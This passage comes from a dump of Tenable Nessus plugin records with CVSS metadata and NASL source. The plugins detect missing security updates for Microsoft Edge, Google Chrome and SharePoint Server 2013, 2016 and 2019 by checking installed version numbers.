script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 90.0.818.46 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21226\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nconstraints = [\n { 'fixed_version' : '90.0.818.46' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:35", "description": "The version of Google Chrome installed on the remote Windows host is prior to 90.0.4430.85. It is, therefore, affected by multiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop_20 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-20T00:00:00", "type": "nessus", "title": "Google Chrome < 90.0.4430.85 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_90_0_4430_85.NASL", "href": "https://www.tenable.com/plugins/nessus/148848", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148848);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2021-21222\",\n \"CVE-2021-21223\",\n \"CVE-2021-21224\",\n \"CVE-2021-21225\",\n \"CVE-2021-21226\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0187-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Google Chrome < 90.0.4430.85 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 90.0.4430.85. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop_20 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?70d7f7db\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1194046\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195777\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195977\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1197904\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 90.0.4430.85 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21226\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'90.0.4430.85', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:50:37", "description": "The Microsoft SharePoint Server 2013 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-26420, CVE-2021-31963, CVE-2021-31964, CVE-2021-31966)\n\n - Microsoft SharePoint Server Spoofing Vulnerability (CVE-2021-31948, CVE-2021-31950) \n\n - Microsoft SharePoint Server Information Disclosure Vulnerability (CVE-2021-31965) Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft SharePoint Server 2013 (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31948", "CVE-2021-31950", "CVE-2021-31963", "CVE-2021-31964", "CVE-2021-31965", "CVE-2021-31966"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint_server"], "id": "SMB_NT_MS21_JUNE_OFFICE_SHAREPOINT_2013.NASL", "href": "https://www.tenable.com/plugins/nessus/150360", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150360);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26420\",\n \"CVE-2021-31948\",\n \"CVE-2021-31950\",\n \"CVE-2021-31963\",\n \"CVE-2021-31964\",\n \"CVE-2021-31965\",\n \"CVE-2021-31966\"\n );\n script_xref(name:\"MSKB\", value:\"5001954\");\n script_xref(name:\"MSKB\", value:\"5001962\");\n script_xref(name:\"MSFT\", value:\"MS21-5001954\");\n script_xref(name:\"MSFT\", value:\"MS21-5001962\");\n script_xref(name:\"IAVA\", value:\"2021-A-0277-S\");\n\n script_name(english:\"Security Updates for Microsoft SharePoint Server 2013 (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft SharePoint Server 2013 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft SharePoint Server 2013 installation on the remote host is missing security updates. It is, therefore, \naffected by multiple vulnerabilities:\n\n - Microsoft SharePoint Server Remote Code Execution Vulnerability \n (CVE-2021-26420, CVE-2021-31963, CVE-2021-31964, CVE-2021-31966)\n\n - Microsoft SharePoint Server Spoofing Vulnerability (CVE-2021-31948, CVE-2021-31950) \n\n - Microsoft SharePoint Server Information Disclosure Vulnerability (CVE-2021-31965) \n \nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001954\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001962\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5001954\n -KB5001962\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31966\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31963\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_sharepoint_installed.nbin\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-06';\nvar app_name = 'Microsoft SharePoint Server';\nvar kbs = make_list(\n '5001954',\n '5001962'\n);\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\n# Get path information for Windows.\nvar windir = hotfix_get_systemroot();\nif (isnull(windir)) exit(1, 'Failed to determine the location of %windir%.');\n\nregistry_init();\n\nvar install = get_single_install(app_name:app_name);\n\nvar kb_checks =\n{\n '2013':\n { '1':\n {'Foundation':\n [{\n 'kb' : '5001962',\n 'path' : hotfix_get_commonfilesdir(),\n 'append' : 'microsoft shared\\\\web server extensions\\\\15\\\\bin',\n 'file' : 'onetutil.dll',\n 'version' : '15.0.5353.1000',\n 'product_name' : 'Microsoft SharePoint Foundation Server 2013 SP1'\n }],\n 'Server':\n [{\n 'kb' : '5001954',\n 'path' : install['path'],\n 'append' : 'webservices\\\\conversionservices',\n 'file' : 'msoserver.dll',\n 'version' : '15.0.5353.1000',\n 'product_name' : 'Microsoft SharePoint Enterprise Server 2013 SP1'\n }]\n }\n }\n};\n\n# Get the specific product / path\nvar param_list = kb_checks[install['Product']][install['SP']][install['Edition']];\n# audit if not affected\nif(isnull(param_list)) audit(AUDIT_HOST_NOT, 'affected');\nvar port = kb_smb_transport();\n# grab the path otherwise\nforeach check (param_list)\n{\n if (!isnull(check['version']))\n {\n var path = check['path'];\n if (!empty_or_null(check['append']))\n path = hotfix_append_path(path:check['path'], value:check['append']);\n are_we_vuln = hotfix_check_fversion(\n file:check['file'],\n version:check['version'],\n path:path,\n kb:check['kb'],\n product:check['product_name']\n );\n }\n else\n {\n var report = '\\n';\n if (check['product_name'])\n report += ' Product : ' + check['product_name'] + '\\n';\n if (check['kb'])\n report += ' KB : ' + check['kb'] + '\\n';\n hotfix_add_report(report, kb:check['kb']);\n }\n\n if(are_we_vuln == HCF_OLDER) vuln = TRUE;\n\n}\nif (vuln)\n{\n port = kb_smb_transport();\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_INST_VER_NOT_VULN, app_name);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:53", "description": "The Microsoft SharePoint Server 2016 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-26420, CVE-2021-31963, CVE-2021-31964, CVE-2021-31966)\n\n - Microsoft SharePoint Server Spoofing Vulnerability (CVE-2021-31948, CVE-2021-31950) \n\n - Microsoft SharePoint Server Information Disclosure Vulnerability (CVE-2021-31965) Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Sharepoint 2016 (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31948", "CVE-2021-31950", "CVE-2021-31963", "CVE-2021-31964", "CVE-2021-31965", "CVE-2021-31966"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint_server"], "id": "SMB_NT_MS21_JUNE_OFFICE_SHAREPOINT_2016.NASL", "href": "https://www.tenable.com/plugins/nessus/150364", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150364);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26420\",\n \"CVE-2021-31948\",\n \"CVE-2021-31950\",\n \"CVE-2021-31963\",\n \"CVE-2021-31964\",\n \"CVE-2021-31965\",\n \"CVE-2021-31966\"\n );\n script_xref(name:\"MSKB\", value:\"5001946\");\n script_xref(name:\"MSFT\", value:\"MS21-5001946\");\n script_xref(name:\"IAVA\", value:\"2021-A-0277-S\");\n\n script_name(english:\"Security Updates for Microsoft Sharepoint 2016 (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft SharePoint Server 2016 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft SharePoint Server 2016 installation on the remote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities:\n\n - Microsoft SharePoint Server Remote Code Execution Vulnerability \n (CVE-2021-26420, CVE-2021-31963, CVE-2021-31964, CVE-2021-31966)\n\n - Microsoft SharePoint Server Spoofing Vulnerability (CVE-2021-31948, CVE-2021-31950) \n\n - Microsoft SharePoint Server Information Disclosure Vulnerability (CVE-2021-31965) \n \nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001946\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5001946\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31966\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31963\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_sharepoint_installed.nbin\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-06';\nvar app_name = 'Microsoft SharePoint Server';\nvar kbs = make_list(\n '5001946'\n);\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\n# Get path information for Windows.\nvar windir = hotfix_get_systemroot();\nif (isnull(windir)) exit(1, 'Failed to determine the location of %windir%.');\n\nregistry_init();\nvar install = get_single_install(app_name:app_name);\nvar kb_checks =\n{\n '2016':\n { '0':\n {'Server':\n [\n {\n 'kb' : '5001946',\n 'path' : hotfix_get_commonfilesdir(),\n 'append' : 'microsoft shared\\\\web server extensions\\\\16\\\\bin',\n 'file' : 'onetutil.dll',\n 'version' : '16.0.5173.1000',\n 'product_name' : 'Microsoft SharePoint Enterprise Server 2016'\n }\n ]\n }\n }\n};\n\n# Get the specific product / path\nvar param_list = kb_checks[install['Product']][install['SP']][install['Edition']];\n# audit if not affected\nif(isnull(param_list)) audit(AUDIT_HOST_NOT, 'affected');\nvar port = kb_smb_transport();\n# grab the path otherwise\nforeach check (param_list)\n{\n if (!isnull(check['version']))\n {\n var path = check['path'];\n if (!empty_or_null(check['append']))\n path = hotfix_append_path(path:check['path'], value:check['append']);\n are_we_vuln = hotfix_check_fversion(\n file:check['file'],\n version:check['version'],\n path:path,\n kb:check['kb'],\n product:check['product_name']\n );\n }\n else\n {\n var report = '\\n';\n if (check['product_name'])\n report += ' Product : ' + check['product_name'] + '\\n';\n if (check['kb'])\n report += ' KB : ' + check['kb'] + '\\n';\n hotfix_add_report(report, kb:check['kb']);\n }\n\n if(are_we_vuln == HCF_OLDER) vuln = TRUE;\n\n}\nif (vuln)\n{\n port = kb_smb_transport();\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_INST_VER_NOT_VULN, app_name);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:32", "description": "The Microsoft SharePoint Server 2019 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-26420, CVE-2021-31963, CVE-2021-31964, CVE-2021-31966)\n\n - Microsoft SharePoint Server Spoofing Vulnerability (CVE-2021-31948, CVE-2021-31950) \n\n - Microsoft SharePoint Server Information Disclosure Vulnerability (CVE-2021-31965) Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft SharePoint Server 2019 (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31948", "CVE-2021-31950", "CVE-2021-31963", "CVE-2021-31964", "CVE-2021-31965", "CVE-2021-31966"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint_server"], "id": "SMB_NT_MS21_JUNE_OFFICE_SHAREPOINT_2019.NASL", "href": "https://www.tenable.com/plugins/nessus/150372", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150372);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26420\",\n \"CVE-2021-31948\",\n \"CVE-2021-31950\",\n \"CVE-2021-31963\",\n \"CVE-2021-31964\",\n \"CVE-2021-31965\",\n \"CVE-2021-31966\"\n );\n script_xref(name:\"MSKB\", value:\"5001944\");\n script_xref(name:\"MSFT\", value:\"MS21-5001944\");\n script_xref(name:\"IAVA\", value:\"2021-A-0277-S\");\n\n script_name(english:\"Security Updates for Microsoft SharePoint Server 2019 (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft SharePoint Server 2019 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft SharePoint Server 2019 installation on the remote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities:\n\n - Microsoft SharePoint Server Remote Code Execution Vulnerability \n (CVE-2021-26420, CVE-2021-31963, CVE-2021-31964, CVE-2021-31966)\n\n - Microsoft SharePoint Server Spoofing Vulnerability (CVE-2021-31948, CVE-2021-31950) \n\n - Microsoft SharePoint Server Information Disclosure Vulnerability (CVE-2021-31965) \n \nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001944\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5001944\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31966\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31963\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_sharepoint_installed.nbin\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-06';\nvar app_name = 'Microsoft SharePoint Server';\n\nvar kbs = 